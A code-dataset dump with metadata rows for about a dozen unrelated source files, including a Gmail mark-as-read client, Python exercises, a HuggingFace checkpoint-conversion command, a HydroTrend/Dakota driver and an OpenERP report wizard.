643ff60586427861267b2eb9c8e880763094d83e | 4609ee89172d6f5f0b0bb59faf13f67f8a4bad28 | /gclient/mark_as_read.py | 21fb6040a8bf72d2e955bbfe3a497187132b5985 | [] | no_license | QuentinDuval/GmailClient | 82cf53f4d412280af608b9d90d50eded75b393e1 | c0a69fe75d22d1ddd932de16107d799473c68e6b | refs/heads/master | 2020-06-10T21:17:02.591884 | 2019-06-25T17:09:40 | 2019-06-25T17:09:40 | 193,750,874 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,861 | py | from __future__ import print_function
from gclient.authentication import *
from googleapiclient.discovery import build
from typing import List
class Classification:
def __init__(self):
self.creds = get_credentials()
self.service = build('gmail', 'v1', credentials=self.creds)
def get_all_labels(self) -> List[str]:
"""
Returns all the labels used to classify mails
"""
results = self.service.users().labels().list(userId='me').execute()
return list(results.get('labels', []))
def list_unread_messages(self, batch_size=500):
"""
Query GMAIL API to get the list of messages matching the "is unread" criteria
"""
answer = self.service.users().messages().list(userId='me', q='is:unread', maxResults=batch_size).execute()
while answer['messages']:
yield answer
if 'nextPageToken' not in answer:
break
next_page_token = answer['nextPageToken']
answer = self.service.users().messages().list(userId='me', pageToken=next_page_token).execute()
def mark_as_read(self, message_ids: List[str]):
"""
Ask the GMAIL API to mark as "read" all the messages given as parameters
"""
return self.service.users().messages().batchModify(userId='me', body={
"removeLabelIds": ["UNREAD"],
"ids": message_ids,
"addLabelIds": []
}).execute()
def mark_all_as_read(self):
for answer in self.list_unread_messages():
message_ids = [message['id'] for message in answer['messages']]
print("Marked", message_ids)
self.mark_as_read(message_ids)
if __name__ == '__main__':
classifier = Classification()
print(classifier.get_all_labels())
print(classifier.mark_all_as_read())
| [
"[email protected]"
] | |
a57fa2b7364d63958571fb4e0853f4351b795d94 | 0add7953d3e3ce2df9e8265102be39b758579753 | /built-in/TensorFlow/Research/reinforcement-learning/ModelZoo_QMIX_TensorFlow/xt/benchmark/configs/default_xt.py | 3f596108539b438663d6aaf4a5988cd8513e8366 | [
"Apache-2.0"
] | permissive | Huawei-Ascend/modelzoo | ae161c0b4e581f8b62c77251e9204d958c4cf6c4 | df51ed9c1d6dbde1deef63f2a037a369f8554406 | refs/heads/master | 2023-04-08T08:17:40.058206 | 2020-12-07T08:04:57 | 2020-12-07T08:04:57 | 319,219,518 | 1 | 1 | Apache-2.0 | 2023-03-24T22:22:00 | 2020-12-07T06:01:32 | Python | UTF-8 | Python | false | false | 428 | py | """
default configure for benchmark function
"""
class XtBenchmarkConf(object):
"""benchmark conf, user also can re-set it"""
default_db_root = "/tmp/.xt_data/sqlite" # could set path by yourself
default_id = "xt_default_benchmark"
defalut_log_path = "/tmp/.xt_data/logs"
default_tb_path = "/tmp/.xt_data/tensorboard"
default_plot_path = "/tmp/.xt_data/plot"
default_train_interval_per_eval = 200
| [
"[email protected]"
] | |
67ffa6937e05e7704b90376cbd3bb100ea85a51e | 901944f407f4a06a4c4027d6139ce21165976857 | /neural_net/Neural_Net_CC/main.py | 41bce1152dcd33c242b3bd32556f6a2f50ee5a48 | [] | no_license | chriscremer/Other_Code | a406da1d567d63bf6ef9fd5fbf0a8f177bc60b05 | 7b394fa87523803b3f4536b316df76cc44f8846e | refs/heads/master | 2021-01-17T02:34:56.215047 | 2020-05-26T13:59:05 | 2020-05-26T13:59:05 | 34,680,279 | 7 | 4 | null | null | null | null | UTF-8 | Python | false | false | 2,354 | py |
import numpy as np
import csv
import random
import pickle
from NN_cc import Network
from costs import *
from activations import *
from sklearn import preprocessing
if __name__ == "__main__":
####################################
#Load data
####################################
MY_DATASET = '/data1/morrislab/ccremer/simulated_data/simulated_classification_data_100_samps_1000_feats_3_distinct.csv'
X = []
y = []
header = True
with open(MY_DATASET, 'r') as f:
csvreader = csv.reader(f, delimiter=',', skipinitialspace=True)
for row in csvreader:
if header:
header = False
continue
X.append(map(float,row[1:-1]))
if str(row[-1]) == '0.0':
y.append([1.0,0.0])
else:
y.append([0.0,1.0])
X = np.array(X)
y = np.array(y)
#preprocess
preprocessor = preprocessing.StandardScaler()
preprocessor.fit(X)
X = preprocessor.transform(X)
#X_test = preprocessor.transform(X_test)
training_data= []
for i in range(0,70):
training_data.append((np.array(X[i], ndmin=2).T, np.array(y[i], ndmin=2).T))
evaluation_data= []
for i in range(70,100):
evaluation_data.append((np.array(X[i], ndmin=2).T, np.array(y[i], ndmin=2).T))
print 'Numb of Samples: ' + str(len(training_data))
print 'X shape: ' + str(training_data[0][0].shape)
print 'y shape: ' + str(training_data[0][1].shape)
####################################
#Train Model
####################################
#load pickled model
weights_n_biases = pickle.load( open( "saved/w_n_b.p", "rb" ) )
#weights_n_biases = None
#dimension of input, hidden layer, dimension of output
net = Network(layer_sizes=[len(X[0]), 3, len(y[0])],
activations=[Sigmoid_Activation, Sigmoid_Activation],
cost=CrossEntropyCost,
regularization='l1',
weights_n_biases=weights_n_biases)
evaluation_cost, evaluation_accuracy, training_cost, training_accuracy = net.SGD(training_data=training_data,
epochs=200,
mini_batch_size=2,
learn_rate=0.001,
lmbda=0.001,
monitor_training_cost=True,
monitor_training_accuracy=True,
evaluation_data=evaluation_data,
monitor_evaluation_cost=True,
monitor_evaluation_accuracy=True
)
| [
"[email protected]"
] | |
3b9fe333e7d4065f42d1f796e206238245df2998 | 99d7a6448a15e7770e3b6f3859da043300097136 | /src/database/orms/api.py | e8c05566f0edc99644329043e8244fbdd6556648 | [] | no_license | softtrainee/arlab | 125c5943f83b37bc7431ae985ac7b936e08a8fe4 | b691b6be8214dcb56921c55daed4d009b0b62027 | refs/heads/master | 2020-12-31T07:54:48.447800 | 2013-05-06T02:49:12 | 2013-05-06T02:49:12 | 53,566,313 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 866 | py | #===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#===============================================================================
from bakeout_orm import *
from device_scan_orm import *
from power_map_orm import *
from power_orm import *
from video_orm import *
| [
"jirhiker@localhost"
] | jirhiker@localhost |
149aed53ef04fe6d76ede1ef8340dd96c015d78c | e9cdf644f02c5f90e5af4ebcdfbd49e5739b379e | /lists/urls.py | fe220099563a5549be4bb60720a1f07720c68cff | [] | no_license | jaeyholic/airbnb-clone | 14e661012f3650a7c1486e43bbcb314eb0ac1ba1 | 68c1815e2b62bbf70dfe5a4a580d970015eaccc2 | refs/heads/master | 2022-12-13T08:11:04.759907 | 2020-02-12T02:22:28 | 2020-02-12T02:22:28 | 236,361,148 | 0 | 0 | null | 2022-12-10T17:29:25 | 2020-01-26T19:04:10 | Python | UTF-8 | Python | false | false | 143 | py | from django.urls import path
from . import views
app_name = "trips"
urlpatterns = [
path("", views.ListView.as_view(), name="trips"),
]
| [
"[email protected]"
] | |
3b2c8a39c47fb25067878ad79635a6e28b0ae266 | f6e03bc2747e8d1ca686b25e7f34a429886ba3f3 | /machinelearning/cbct/build_cbct_learner.py | 073853c6c8166f3e77a0a6c519c82cc5d099f2dc | [
"MIT"
] | permissive | randlet/pylinac | 2b3913d7d549b985a074ddcf291d018cfb1dd5d2 | df5dd913f429536180d998012b4f5cef8d443f88 | refs/heads/master | 2021-06-11T08:50:36.472577 | 2019-06-03T14:23:17 | 2019-06-03T14:23:17 | 151,657,740 | 1 | 0 | MIT | 2018-10-05T01:40:17 | 2018-10-05T01:40:16 | null | UTF-8 | Python | false | false | 276 | py | import os.path as osp
from machinelearning.tools import train
path = osp.join(osp.dirname(__file__), 'data', 'CatPhan 600')
parameters = {
'kernel': ['linear'],
'C': [1, 0.1, 5, 10, 50],
}
train(path, train_size=0.95, parameters=parameters, clf_name='catphan600')
| [
"[email protected]"
] | |
6a2be014eb9649c77461f9d7117a20e1f10fb3d6 | 0502750293383c6dae2aaf4013717d9c83f52c62 | /exercism/python/archive/circular-buffer/circular_buffer.py | c143a3cdcdf9880436d13286be272c674f6461d5 | [] | no_license | sebito91/challenges | fcfb680e7fc1abfa9fea9cd5f108c42795da4679 | b4f2d3b7f8b7c78f02b67d67d4bcb7fad2b7e284 | refs/heads/master | 2023-07-08T15:43:42.850679 | 2023-06-26T19:38:51 | 2023-06-26T19:38:51 | 117,160,720 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,199 | py | """ Mdolue to implement a circular-buffer """
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
class BufferFullException(Exception):
""" define execption when buffer is full """
def __init__(self, message=None):
if not message:
message = "buffer is full"
super(BufferFullException, self).__init__(message)
class BufferEmptyException(Exception):
""" define exception when buffer is empty """
def __init__(self, message=None):
if not message:
message = "buffer is empty"
super(BufferEmptyException, self).__init__(message)
class CircularBuffer(object):
""" definition of the back CircularBuffer class """
def __init__(self, datasize):
if datasize <= 0:
raise ValueError("improper size for CircularBuffer: {}".format(datasize))
self.buffer = [None] * datasize
self.capacity = datasize
self.current = (0, 0)
def get_elem(self, index):
""" helper function to increment counters """
temp = self.current[0]
if index == 0:
self.current = ((self.current[0] + 1) % (self.capacity), self.current[1])
else:
temp = self.current[1]
self.current = (self.current[0], (self.current[1] + 1) % (self.capacity))
return temp
def read(self):
""" read function as part of CircularBuffer """
if len(self.buffer) < 1 or all(each is None for each in self.buffer):
raise BufferEmptyException("tried reading from empty buffer")
idx = self.get_elem(0)
data = self.buffer[idx]
self.buffer[idx] = None
return data
def write(self, data):
""" write function as part of CircularBuffer """
if self.current[0] == self.current[1] and self.buffer[self.current[0]]:
raise BufferFullException("cannot add {} to full buffer".format(data))
self.buffer[self.get_elem(1)] = data
def overwrite(self, data):
""" overwrite the oldest data first """
self.buffer[self.get_elem(0)] = data
def clear(self):
""" clear out the buffer """
self.buffer = [None] * self.capacity
| [
"[email protected]"
] | |
d6c6f07c20d59e2954fa76d05a86559f3dc82759 | a31c54cb9b27e315567ed865e07cb720fc1e5c8e | /revenge/techniques/native_timeless_tracer/timeless_trace_item.py | f94c99a65e749528e119e21889e9b5142e3c5bcd | [] | no_license | bannsec/revenge | 212bc15e09f7d864c837a1829b3dc96410e369d3 | 2073b8fad76ff2ba21a5114be54e959297aa0cf9 | refs/heads/master | 2021-06-25T12:26:02.609076 | 2020-05-29T15:46:45 | 2020-05-29T15:46:45 | 188,461,358 | 51 | 6 | null | null | null | null | UTF-8 | Python | false | false | 2,456 | py |
import logging
logger = logging.getLogger(__name__)
from ... import common
class NativeTimelessTraceItem(object):
def __init__(self, process, context=None, depth=None, previous=None):
"""Class describing a single step of NativeTimelessTracing
Args:
process (revenge.Process): Process object
context (dict): Dictionary describing this step's context
depth (int): Current call depth
previous (NativeTimelessTraceItem, optional): Previous timeless
trace item to use for differential generation
"""
self._process = process
self._previous = previous
self.context = context
self.depth = depth
def __repr__(self):
attrs = ["NativeTimelessTraceItem"]
attrs.append(str(self.context.pc.next.thing))
return "<{}>".format(' '.join(attrs))
@classmethod
@common.validate_argument_types(snapshot=dict)
def from_snapshot(klass, process, snapshot, previous=None):
"""Creates a NativeTimelessTraceItem from a snapshot returned by timeless_snapshot()
Args:
process (revenge.Process): Process object
snapshot (dict): Timeless snapshot dictionary
previous (NativeTimelessTraceItem, optional): Previous timeless
trace item to use for differential generation
"""
if "is_timeless_snapshot" not in snapshot or not snapshot["is_timeless_snapshot"]:
raise RevengeInvalidArgumentType("from_snapshot does not appear to be timeless_snapshot dictionary.")
context = snapshot["context"]
depth = snapshot["depth"]
return klass(process, context=context, depth=depth, previous=previous)
@property
def instruction(self):
"""Returns the assembly instruction object for this item."""
return self.context.pc.next.thing
@property
def context(self):
return self.__context
@context.setter
@common.validate_argument_types(context=(dict, type(None)))
def context(self, context):
diff = self._previous.context if self._previous is not None else None
# TODO: This is an assumption...
if isinstance(context, dict):
self.__context = CPUContext(self._process, diff=diff, **context)
elif context is None:
self.__context = None
from ...exceptions import *
from ...cpu import CPUContext
| [
"[email protected]"
] | |
fee4d2124eac9fad1e5d0bc58e3c6649164ab65c | e245035c7bff120d5f7a8a26412f14d11a77a46f | /huggingface_transformer_src/src/transformers/commands/convert.py | 2ca5a57ca36d0a5c150959f2f1b7daaec455c17a | [
"Apache-2.0"
] | permissive | fuxuelinwudi/R-Drop | 82f27e623f319065b75b9e2b7ebe285c2aa0582b | 88bba6386f2edf7aa45ae6795103dbf4be085e99 | refs/heads/main | 2023-06-06T14:28:55.773778 | 2021-06-27T05:39:27 | 2021-06-27T05:39:27 | 381,313,887 | 2 | 0 | MIT | 2021-06-29T09:43:58 | 2021-06-29T09:43:58 | null | UTF-8 | Python | false | false | 7,555 | py | # Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from argparse import ArgumentParser, Namespace
from ..utils import logging
from . import BaseTransformersCLICommand
def convert_command_factory(args: Namespace):
    """
    Factory function used to convert a model TF 1.0 checkpoint in a PyTorch checkpoint.

    Returns: ConvertCommand
    """
    # (Docstring fixed: it previously claimed to return a ServeCommand,
    # a copy-paste leftover from the serving command factory.)
    return ConvertCommand(
        args.model_type, args.tf_checkpoint, args.pytorch_dump_output, args.config, args.finetuning_task_name
    )
# Shown whenever a converter import fails because TensorFlow is not installed.
IMPORT_ERROR_MESSAGE = """
transformers can only be used from the commandline to convert TensorFlow models in PyTorch, In that case, it requires
TensorFlow to be installed. Please see https://www.tensorflow.org/install/ for installation instructions.
"""
class ConvertCommand(BaseTransformersCLICommand):
    """``transformers-cli convert``: convert an original (mostly TF 1.0)
    checkpoint into a Transformers PyTorch checkpoint."""

    @staticmethod
    def register_subcommand(parser: ArgumentParser):
        """
        Register this command to argparse so it's available for the transformer-cli

        Args:
            parser: Root parser to register command-specific arguments
        """
        train_parser = parser.add_parser(
            "convert",
            help="CLI tool to run convert model from original "
            "author checkpoints to Transformers PyTorch checkpoints.",
        )
        train_parser.add_argument("--model_type", type=str, required=True, help="Model's type.")
        train_parser.add_argument(
            "--tf_checkpoint", type=str, required=True, help="TensorFlow checkpoint path or folder."
        )
        train_parser.add_argument(
            "--pytorch_dump_output", type=str, required=True, help="Path to the PyTorch saved model output."
        )
        train_parser.add_argument("--config", type=str, default="", help="Configuration file path or folder.")
        train_parser.add_argument(
            "--finetuning_task_name",
            type=str,
            default=None,
            help="Optional fine-tuning task name if the TF model was a finetuned model.",
        )
        train_parser.set_defaults(func=convert_command_factory)

    def __init__(
        self,
        model_type: str,
        tf_checkpoint: str,
        pytorch_dump_output: str,
        config: str,
        finetuning_task_name: str,
        *args
    ):
        self._logger = logging.get_logger("transformers-cli/converting")

        self._logger.info(f"Loading model {model_type}")
        self._model_type = model_type
        self._tf_checkpoint = tf_checkpoint
        self._pytorch_dump_output = pytorch_dump_output
        self._config = config
        self._finetuning_task_name = finetuning_task_name

    def run(self):
        """Dispatch to the per-model conversion script.

        Each branch imports its converter lazily so TensorFlow is only
        required for the model type actually being converted; branches whose
        converters do not need TensorFlow (gpt, xlm, lxmert) import without
        the ImportError guard.
        """
        if self._model_type == "albert":
            try:
                from ..models.albert.convert_albert_original_tf_checkpoint_to_pytorch import (
                    convert_tf_checkpoint_to_pytorch,
                )
            except ImportError:
                raise ImportError(IMPORT_ERROR_MESSAGE)

            convert_tf_checkpoint_to_pytorch(self._tf_checkpoint, self._config, self._pytorch_dump_output)
        elif self._model_type == "bert":
            try:
                from ..models.bert.convert_bert_original_tf_checkpoint_to_pytorch import (
                    convert_tf_checkpoint_to_pytorch,
                )
            except ImportError:
                raise ImportError(IMPORT_ERROR_MESSAGE)

            convert_tf_checkpoint_to_pytorch(self._tf_checkpoint, self._config, self._pytorch_dump_output)
        elif self._model_type == "funnel":
            try:
                from ..models.funnel.convert_funnel_original_tf_checkpoint_to_pytorch import (
                    convert_tf_checkpoint_to_pytorch,
                )
            except ImportError:
                raise ImportError(IMPORT_ERROR_MESSAGE)

            convert_tf_checkpoint_to_pytorch(self._tf_checkpoint, self._config, self._pytorch_dump_output)
        elif self._model_type == "t5":
            try:
                from ..models.t5.convert_t5_original_tf_checkpoint_to_pytorch import convert_tf_checkpoint_to_pytorch
            except ImportError:
                raise ImportError(IMPORT_ERROR_MESSAGE)

            convert_tf_checkpoint_to_pytorch(self._tf_checkpoint, self._config, self._pytorch_dump_output)
        elif self._model_type == "gpt":
            from ..models.openai.convert_openai_original_tf_checkpoint_to_pytorch import (
                convert_openai_checkpoint_to_pytorch,
            )

            convert_openai_checkpoint_to_pytorch(self._tf_checkpoint, self._config, self._pytorch_dump_output)
        elif self._model_type == "transfo_xl":
            try:
                from ..models.transfo_xl.convert_transfo_xl_original_tf_checkpoint_to_pytorch import (
                    convert_transfo_xl_checkpoint_to_pytorch,
                )
            except ImportError:
                raise ImportError(IMPORT_ERROR_MESSAGE)

            # The same CLI argument carries either a checkpoint ("ckpt" in
            # the name) or a dataset file; route it accordingly.
            if "ckpt" in self._tf_checkpoint.lower():
                TF_CHECKPOINT = self._tf_checkpoint
                TF_DATASET_FILE = ""
            else:
                TF_DATASET_FILE = self._tf_checkpoint
                TF_CHECKPOINT = ""
            convert_transfo_xl_checkpoint_to_pytorch(
                TF_CHECKPOINT, self._config, self._pytorch_dump_output, TF_DATASET_FILE
            )
        elif self._model_type == "gpt2":
            try:
                from ..models.gpt2.convert_gpt2_original_tf_checkpoint_to_pytorch import (
                    convert_gpt2_checkpoint_to_pytorch,
                )
            except ImportError:
                raise ImportError(IMPORT_ERROR_MESSAGE)

            convert_gpt2_checkpoint_to_pytorch(self._tf_checkpoint, self._config, self._pytorch_dump_output)
        elif self._model_type == "xlnet":
            try:
                from ..models.xlnet.convert_xlnet_original_tf_checkpoint_to_pytorch import (
                    convert_xlnet_checkpoint_to_pytorch,
                )
            except ImportError:
                raise ImportError(IMPORT_ERROR_MESSAGE)

            convert_xlnet_checkpoint_to_pytorch(
                self._tf_checkpoint, self._config, self._pytorch_dump_output, self._finetuning_task_name
            )
        elif self._model_type == "xlm":
            from ..models.xlm.convert_xlm_original_pytorch_checkpoint_to_pytorch import (
                convert_xlm_checkpoint_to_pytorch,
            )

            convert_xlm_checkpoint_to_pytorch(self._tf_checkpoint, self._pytorch_dump_output)
        elif self._model_type == "lxmert":
            from ..models.lxmert.convert_lxmert_original_pytorch_checkpoint_to_pytorch import (
                convert_lxmert_checkpoint_to_pytorch,
            )

            convert_lxmert_checkpoint_to_pytorch(self._tf_checkpoint, self._pytorch_dump_output)
        else:
            # Message fixed: it previously omitted "albert" and "funnel",
            # both of which are handled above.
            raise ValueError(
                "--model_type should be selected in the list [albert, bert, funnel, gpt, gpt2, t5, "
                "transfo_xl, xlnet, xlm, lxmert]"
            )
| [
"[email protected]"
] | |
aa5c4a98512495974fb7608726a4f591fddd94e6 | 8e39a4f4ae1e8e88d3b2d731059689ad5b201a56 | /dev-util/itstool/itstool-2.0.2.py | 98413b632277dc442d4cbfa589f28591e237e38c | [] | no_license | wdysln/new | d5f5193f81a1827769085932ab7327bb10ef648e | b643824b26148e71859a1afe4518fe05a79d333c | refs/heads/master | 2020-05-31T00:12:05.114056 | 2016-01-04T11:38:40 | 2016-01-04T11:38:40 | 37,287,357 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 219 | py | metadata = """
summary @ XML to PO and back again
homepage @ http://itstool.org/
license @ GPL3
src_url @ http://files.itstool.org/$name/$fullname.tar.bz2
arch @ ~x86_64
"""
depends = """
build @ dev-libs/libxml2
"""
| [
"[email protected]"
] | |
9bb91005f84d4d67416db899318bf4ddb657920e | 463febc26f9f6e09d51206c87c7450476b1dfa7c | /0x0C-nqueens/0-nqueens.py | b48a68afd83f68b7c5b517b2fcb380f754708017 | [] | no_license | Nahi-Terefe/holbertonschool-interview | 77a5fd0e668cabaa2f986ded265996061fcbc9f8 | e4842430f346d5b18e407ac468ba225aaeaae9d8 | refs/heads/master | 2023-02-17T13:31:31.389980 | 2021-01-12T00:24:42 | 2021-01-12T00:24:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,734 | py | #!/usr/bin/python3
""" Solving n queens """
import sys
# error handling for argv[1]
if __name__ == "__main__":
    # --- command-line validation: exactly one integer argument N >= 4 ---
    if len(sys.argv) == 1 or len(sys.argv) > 2:
        print("Usage: nqueens N")
        sys.exit(1)
    N = sys.argv[1]
    try:
        N_int = int(N)
    except ValueError:
        print("N must be a number")
        sys.exit(1)
    if N_int < 4:
        print("N must be at least 4")
        sys.exit(1)

    # n queens methods
    coords = []

    def isSafe(coords, row, col):
        """Return True if a queen at (row, col) attacks none in `coords`.

        Single pass with early exit; the original rebuilt four lookup
        lists (rows, cols, both diagonals) on every call.
        """
        for placed_row, placed_col in coords:
            if placed_row == row or placed_col == col:
                return False
            if placed_row + placed_col == row + col:  # same "/" diagonal
                return False
            if placed_col - placed_row == col - row:  # same "\" diagonal
                return False
        return True

    def solveNqueens(coords, col, safe_queens=None):
        """Backtrack over column `col`; return the list of full solutions.

        Bug fix: the original used a mutable default (`safe_queens=[]`)
        as hidden shared state between the top-level call and the
        recursive calls; the accumulator is now threaded through the
        recursion explicitly, so repeated top-level calls cannot leak
        results into each other.
        """
        if safe_queens is None:
            safe_queens = []
        for x in range(N_int):
            if isSafe(coords, x, col):
                coords.append([x, col])
                if col == N_int - 1:
                    # Last column placed: record a copy of this solution.
                    safe_queens.append(coords.copy())
                    del coords[-1]
                else:
                    solveNqueens(coords, col + 1, safe_queens)
        # Undo this column's placement before returning to the caller.
        if len(coords):
            del coords[-1]
        return safe_queens

    # sets base case for recursion
    coords = solveNqueens(coords, 0)

    # prints coords of squares for safe queens
    for squares in coords:
        print(squares)
| [
"[email protected]"
] | |
c99cf3261ef3264d9556a7b23a4752ba3d1719ea | 95c9cfb57346a4ff45b05847c2fd740cdd60fb79 | /examples/2-hydrotrend/run_hydrotrend.py | fcff63ddf946fbbaae6da021a5b914505fc530ec | [
"MIT"
] | permissive | mdpiper/dakota-tutorial | 1234812eaf00e97999abcdccc0a3027ed2bb1d92 | de5177bc741a0475266011de8363ff1ad4ce5ff0 | refs/heads/master | 2021-01-17T22:07:44.576114 | 2015-05-25T18:54:24 | 2015-05-25T18:54:24 | 35,640,799 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,479 | py | #! /usr/bin/env python
# Brokers communication between HydroTrend and Dakota through files.
# Mark Piper ([email protected])
import sys
import os
import re
import shutil
from subprocess import call
import numpy as np
def read(output_file):
    """Load one column of HydroTrend output, skipping the two header lines."""
    return np.loadtxt(fname=output_file, skiprows=2)
def write(results_file, array, labels):
    """Write a Dakota results file: one `<value><TAB><label>` line per entry."""
    with open(results_file, 'w') as fp:
        for idx, value in enumerate(array):
            fp.write(str(value) + '\t' + labels[idx] + '\n')
def get_labels(params_file):
    """Extract response labels from a Dakota parameters file.

    Labels are the `:`-suffixed tokens of every line mentioning ``ASV_``
    (the active-set-vector entries), concatenated per line.
    """
    with open(params_file, 'r') as fp:
        # 'ASV_' has no regex metacharacters, so a substring test is
        # equivalent to the original re.search call.
        return [''.join(re.findall(r':(\S+)', line))
                for line in fp
                if 'ASV_' in line]
def main():
    """Dakota analysis driver: run one HydroTrend simulation.

    Dakota invokes this script with two positional arguments:
    ``sys.argv[1]`` is the parameters file it wrote, ``sys.argv[2]`` is the
    results file this driver must produce.
    """
    # Files and directories.
    start_dir = os.path.dirname(os.path.realpath(__file__))
    input_dir = os.path.join(start_dir, 'HYDRO_IN')
    if os.path.exists(input_dir) is False:
        os.mkdir(input_dir)
    output_dir = os.path.join(start_dir, 'HYDRO_OUTPUT')
    if os.path.exists(output_dir) is False:
        os.mkdir(output_dir)
    input_template = 'HYDRO.IN.template'
    input_file = 'HYDRO.IN'
    hypsometry_file = 'HYDRO0.HYPS'
    output_file = 'HYDROASCII.QS'  # suspended-sediment discharge series

    # Use the parsing utility `dprepro` (from $DAKOTA_DIR/bin) to
    # incorporate the parameters from Dakota into the HydroTrend input
    # template, creating a new HydroTrend input file.
    shutil.copy(os.path.join(start_dir, input_template), os.curdir)
    call(['dprepro', sys.argv[1], input_template, input_file])
    shutil.copy(input_file, input_dir)
    shutil.copy(os.path.join(start_dir, hypsometry_file), input_dir)

    # Call HydroTrend, using the updated input file.
    call(['hydrotrend',
          '--in-dir', os.path.relpath(input_dir),
          '--out-dir', os.path.relpath(output_dir)])

    # Calculate mean and standard deviation of a HydroTrend output time
    # series for the simulation. Write the output to a Dakota results file.
    shutil.copy(os.path.join(output_dir, output_file), os.curdir)
    labels = get_labels(sys.argv[1])
    series = read(output_file)
    # NOTE(review): np.loadtxt raises rather than returning None, so the
    # fallback branch below appears unreachable -- confirm original intent.
    if series is not None:
        m_series = [np.mean(series), np.std(series)]
    else:
        m_series = [0, 0]
    write(sys.argv[2], m_series, labels)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
2afb87b876777eba3345babac92efef1ee1fa736 | 0d0afd1dce972b4748ce8faccd992c019794ad9e | /integra/exata_personalizacao/wizard/projeto_relatorio.py | 4618ff3fdae885ab494f0eb9f31e24029bb9adc2 | [] | no_license | danimaribeiro/odoo-erp | e2ca2cfe3629fbedf413e85f7c3c0453fd16941e | d12577bf7f5266b571cbedeb930720d653320e96 | refs/heads/master | 2020-01-23T21:32:16.149716 | 2016-11-05T15:35:40 | 2016-11-05T15:35:40 | 67,892,809 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,555 | py | # -*- encoding: utf-8 -*-
import os
from osv import orm, fields, osv
import base64
from finan.wizard.finan_relatorio import Report
from pybrasil.data import parse_datetime, mes_passado, primeiro_dia_mes, ultimo_dia_mes, hoje, agora, formata_data
from finan.wizard.relatorio import *
from datetime import date
import csv
from pybrasil.base import DicionarioBrasil
from pybrasil.valor.decimal import Decimal as D
from pybrasil.valor import formata_valor
from pybrasil.data.grafico_gantt import tempo_tarefa
from dateutil.relativedelta import relativedelta
DIR_ATUAL = os.path.abspath(os.path.dirname(__file__))
JASPER_BASE_DIR = os.path.join(DIR_ATUAL, '../../reports/base/')
class projeto_relatorio(osv.osv_memory):
    # Transient wizard (OpenERP 7 `osv_memory`) extending the base
    # `projeto.relatorio` wizard from the `finan` module with a
    # "properties per project" Jasper report.
    _name = 'projeto.relatorio'
    _inherit = 'projeto.relatorio'
    def gera_relatorio_imovel_projeto(self, cr, uid, ids, context={}):
        """Render the 'Imoveis por Projeto' Jasper report for the first
        selected wizard record and store it on that record as a base64
        attachment.  Returns False when no ids are given, True on success.
        """
        if not ids:
            return False
        id = ids[0]
        rel_obj = self.browse(cr, uid, id, context=context)
        rel = Report('Imoveis por Projeto', cr, uid)
        rel.caminho_arquivo_jasper = os.path.join(JASPER_BASE_DIR, 'exata_relatorio_venda_projeto.jrxml')
        rel.outputFormat = rel_obj.formato
        rel.parametros['PROJETO_ID'] = rel_obj.project_id.id
        # execute() returns the rendered bytes plus the effective format.
        pdf, formato = rel.execute()
        dados = {
            'nome': u'Imoveis_' + rel_obj.project_id.name + '.' + rel_obj.formato,
            'arquivo': base64.encodestring(pdf)
        }
        rel_obj.write(dados)
        return True
# OpenERP 7 convention: instantiating the class registers the model.
projeto_relatorio()
| [
"[email protected]"
] | |
305da2da6f4b22e89e4160f93e3e470090d20926 | d78dfc5089717fc242bbd7097f507d811abb4260 | /USA/script.icechannel.Usefile.settings/default.py | bdf16309ca6cef9b0506ee0fee1844dc07dd00bb | [] | no_license | tustxk/AddOnRepo | 995b980a9ec737e2c25bed423fc83f710c697e40 | 6b86a06cb37e6e10b4119584dd7311ebc2318e54 | refs/heads/master | 2022-10-08T21:34:34.632346 | 2016-10-28T09:48:01 | 2016-10-28T09:48:01 | 70,684,775 | 1 | 1 | null | 2022-10-01T16:27:13 | 2016-10-12T09:31:16 | Python | UTF-8 | Python | false | false | 163 | py | addon_id="script.icechannel.Usefile.settings"
addon_name="iStream - Usefile - Settings"
import xbmcaddon
addon = xbmcaddon.Addon(id=addon_id)
addon.openSettings()
| [
"[email protected]"
] | |
31d493116b2e621b5d93a3977480ec7ae3fd48cf | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2157/60749/252819.py | e40d7365ee8419681863874c71cda7f98525182e | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 510 | py | str1=input()
def RomaToNum(str1):
dic={'I':1, 'V':5, 'X':10, 'L':50,'C':100,'D':500,'M':1000}
res=[]
for h in str1:
res.append(dic[h])
max1=0
for t in res:
max1=max(t,max1)
max_index=res.index(max1)
result=0
for h in range(0,max_index):
result-=res[h]
for h in range(max_index, len(res)-1):
if res[h]>=res[h+1]:
result+=res[h]
else:
result-=res[h]
result+=res[-1]
return result
print(RomaToNum(str1)) | [
"[email protected]"
] | |
